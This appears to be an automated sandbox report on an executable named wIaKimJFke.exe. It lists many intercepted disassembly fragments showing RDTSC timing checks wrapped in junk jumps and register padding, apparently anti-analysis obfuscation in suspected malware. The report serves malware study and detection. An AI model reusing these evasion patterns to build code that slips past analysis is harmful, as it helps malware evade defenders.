                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E60129 second address: 4E60174 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FED75508876h 0x0000000f mov ebx, dword ptr [ebp+10h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007FED7550886Dh 0x0000001a call 00007FED75508870h 0x0000001f pop esi 0x00000020 popad 0x00000021 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E60174 second address: 4E601AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E520h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FED74F3E520h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FED74F3E51Eh 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E601AA second address: 4E601DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FED75508876h 0x0000000f mov esi, dword ptr [ebp+08h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov ecx, edx 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E601DB second address: 4E60217 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, di 0x00000006 pushfd 0x00000007 jmp 00007FED74F3E527h 0x0000000c jmp 00007FED74F3E523h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 xchg eax, edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E60217 second address: 4E60232 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508877h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E60232 second address: 4E6025E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FED74F3E51Ch 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E6025E second address: 4E60280 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 jmp 00007FED7550886Dh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, edi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov eax, edx 0x00000014 mov ebx, 3E95653Ah 0x00000019 popad 0x0000001a rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E60280 second address: 4E60304 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E520h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007FED74F3E520h 0x00000010 je 00007FEDE700C885h 0x00000016 jmp 00007FED74F3E520h 0x0000001b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000022 jmp 00007FED74F3E520h 0x00000027 je 00007FEDE700C86Eh 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FED74F3E51Dh 0x00000036 xor ax, 2476h 0x0000003b jmp 00007FED74F3E521h 0x00000040 popfd 0x00000041 mov ebx, ecx 0x00000043 popad 0x00000044 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E60304 second address: 4E60320 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED75508878h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E60320 second address: 4E603C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [esi+44h] 0x0000000b jmp 00007FED74F3E527h 0x00000010 or edx, dword ptr [ebp+0Ch] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FED74F3E524h 0x0000001a and esi, 297AAE58h 0x00000020 jmp 00007FED74F3E51Bh 0x00000025 popfd 0x00000026 mov edi, esi 0x00000028 popad 0x00000029 test edx, 61000000h 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FED74F3E520h 0x00000036 sbb esi, 7C6C38B8h 0x0000003c jmp 00007FED74F3E51Bh 0x00000041 popfd 0x00000042 jmp 00007FED74F3E528h 0x00000047 popad 0x00000048 jne 00007FEDE700C7EBh 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 push ebx 0x00000052 pop ecx 0x00000053 movsx edi, cx 0x00000056 popad 0x00000057 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E603C2 second address: 4E603D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED7550886Eh 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E603D4 second address: 4E6043B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [esi+48h], 00000001h 0x0000000c pushad 0x0000000d call 00007FED74F3E51Dh 0x00000012 pushfd 0x00000013 jmp 00007FED74F3E520h 0x00000018 add ecx, 7E9CF7D8h 0x0000001e jmp 00007FED74F3E51Bh 0x00000023 popfd 0x00000024 pop esi 0x00000025 jmp 00007FED74F3E529h 0x0000002a popad 0x0000002b jne 00007FEDE700C78Bh 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 mov edx, 66E7774Eh 0x00000039 popad 0x0000003a rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E6043B second address: 4E60441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E60441 second address: 4E60445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E60445 second address: 4E60456 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test bl, 00000007h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E60456 second address: 4E60468 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E51Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E60468 second address: 4E6047A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED7550886Eh 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E6047A second address: 4E6047E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E50884 second address: 4E508A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 9Ch 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FED7550886Dh 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 movsx edi, si 0x00000014 popad 0x00000015 and esp, FFFFFFF8h 0x00000018 pushad 0x00000019 push ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E508A8 second address: 4E508CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push ebx 0x00000007 jmp 00007FED74F3E524h 0x0000000c mov dword ptr [esp], ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E508CC second address: 4E508E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E508E9 second address: 4E5095C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b call 00007FED74F3E51Ch 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007FED74F3E521h 0x00000019 sbb eax, 43510FB6h 0x0000001f jmp 00007FED74F3E521h 0x00000024 popfd 0x00000025 popad 0x00000026 push eax 0x00000027 jmp 00007FED74F3E521h 0x0000002c xchg eax, esi 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FED74F3E51Dh 0x00000034 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E5095C second address: 4E50A3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FED75508877h 0x00000009 xor ecx, 13C54A4Eh 0x0000000f jmp 00007FED75508879h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FED75508870h 0x0000001b and ax, B6C8h 0x00000020 jmp 00007FED7550886Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 mov esi, dword ptr [ebp+08h] 0x0000002c pushad 0x0000002d jmp 00007FED75508874h 0x00000032 push esi 0x00000033 movsx edx, ax 0x00000036 pop esi 0x00000037 popad 0x00000038 mov ebx, 00000000h 0x0000003d pushad 0x0000003e jmp 00007FED75508874h 0x00000043 popad 0x00000044 test esi, esi 0x00000046 jmp 00007FED7550886Ch 0x0000004b je 00007FEDE75DE1F1h 0x00000051 jmp 00007FED75508870h 0x00000056 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000005d pushad 0x0000005e pushad 0x0000005f mov bx, cx 0x00000062 mov esi, 14DB41DFh 0x00000067 popad 0x00000068 mov edi, eax 0x0000006a popad 0x0000006b mov ecx, esi 0x0000006d push eax 0x0000006e push edx 0x0000006f jmp 00007FED7550886Dh 0x00000074 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E50A3F second address: 4E50A75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FEDE7013E65h 0x0000000f jmp 00007FED74F3E51Eh 0x00000014 test byte ptr [76FB6968h], 00000002h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov bl, 9Eh 0x00000020 popad 0x00000021 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E50A75 second address: 4E50A7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E50A7B second address: 4E50A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E50A7F second address: 4E50AF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FEDE75DE18Ah 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 pop ebx 0x00000015 jmp 00007FED75508876h 0x0000001a popad 0x0000001b call 00007FED75508872h 0x00000020 call 00007FED75508872h 0x00000025 pop eax 0x00000026 pop ebx 0x00000027 popad 0x00000028 mov edx, dword ptr [ebp+0Ch] 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FED75508878h 0x00000034 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E50AF9 second address: 4E50B08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E51Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E50B08 second address: 4E50B0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E50B0E second address: 4E50B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E50B12 second address: 4E50B16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E50B16 second address: 4E50B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E50B25 second address: 4E50B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E50B29 second address: 4E50B42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E525h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E50B42 second address: 4E50BA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FED75508873h 0x00000009 add cl, 0000007Eh 0x0000000c jmp 00007FED75508879h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov dword ptr [esp], ebx 0x00000018 jmp 00007FED7550886Eh 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FED75508877h 0x00000025 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E50BA4 second address: 4E50C1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FED74F3E51Fh 0x00000009 and cx, 12EEh 0x0000000e jmp 00007FED74F3E529h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FED74F3E520h 0x0000001a add al, 00000068h 0x0000001d jmp 00007FED74F3E51Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 push eax 0x00000027 jmp 00007FED74F3E529h 0x0000002c xchg eax, ebx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov esi, ebx 0x00000032 movsx edi, ax 0x00000035 popad 0x00000036 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E50C1D second address: 4E50C77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+14h] 0x0000000c pushad 0x0000000d jmp 00007FED7550886Ch 0x00000012 mov cx, DFB1h 0x00000016 popad 0x00000017 push dword ptr [ebp+10h] 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushfd 0x0000001e jmp 00007FED75508878h 0x00000023 sub si, ECB8h 0x00000028 jmp 00007FED7550886Bh 0x0000002d popfd 0x0000002e rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E50CDD second address: 4E50CF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E50CF2 second address: 4E50D25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 call 00007FED75508873h 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FED75508871h 0x00000019 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E50D25 second address: 4E50D2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E50D2B second address: 4E50D31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E50D31 second address: 4E50D68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E526h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esp, ebp 0x0000000d jmp 00007FED74F3E520h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov eax, edi 0x00000018 mov dh, 5Eh 0x0000001a popad 0x0000001b rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E50D68 second address: 4E50D6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E50D6E second address: 4E50D72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E60D37 second address: 4E60D9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 4A554E1Ah 0x00000008 pushfd 0x00000009 jmp 00007FED7550886Bh 0x0000000e adc si, 97BEh 0x00000013 jmp 00007FED75508879h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e movzx esi, bx 0x00000021 call 00007FED75508879h 0x00000026 movzx esi, di 0x00000029 pop ebx 0x0000002a popad 0x0000002b push eax 0x0000002c pushad 0x0000002d mov esi, edi 0x0000002f movsx edi, si 0x00000032 popad 0x00000033 xchg eax, ebp 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E60D9F second address: 4E60DB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E525h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E60DB8 second address: 4E60E00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FED7550886Eh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov bx, 81F0h 0x00000018 call 00007FED75508879h 0x0000001d pop eax 0x0000001e popad 0x0000001f rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E60AB2 second address: 4E60AC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E51Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E60AC5 second address: 4E60ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E60ACB second address: 4E60ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E60ACF second address: 4E60AED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007FED7550886Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E60AED second address: 4E60AF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EE06F0 second address: 4EE0764 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508874h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FED75508870h 0x0000000f push eax 0x00000010 jmp 00007FED7550886Bh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FED75508876h 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e jmp 00007FED7550886Eh 0x00000023 mov ah, 3Bh 0x00000025 popad 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FED7550886Fh 0x00000030 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EE0764 second address: 4EE0768 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EE0768 second address: 4EE076E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4ED0863 second address: 4ED0869 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4ED0869 second address: 4ED088F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 call 00007FED75508876h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4ED088F second address: 4ED0893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4ED0893 second address: 4ED0897 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4ED0897 second address: 4ED089D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4ED089D second address: 4ED08CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508872h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FED75508877h 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4ED08CF second address: 4ED08E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED74F3E524h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4ED08E7 second address: 4ED08F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4ED08F7 second address: 4ED08FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4ED08FB second address: 4ED0901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4ED0901 second address: 4ED0906 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4ED0906 second address: 4ED0921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 5002h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FED7550886Bh 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4ED0921 second address: 4ED0925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4ED0925 second address: 4ED092B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4ED092B second address: 4ED093A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED74F3E51Bh 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4ED07CE second address: 4ED07F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ax, bx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4ED07F4 second address: 4ED07F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4ED07F8 second address: 4ED07FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
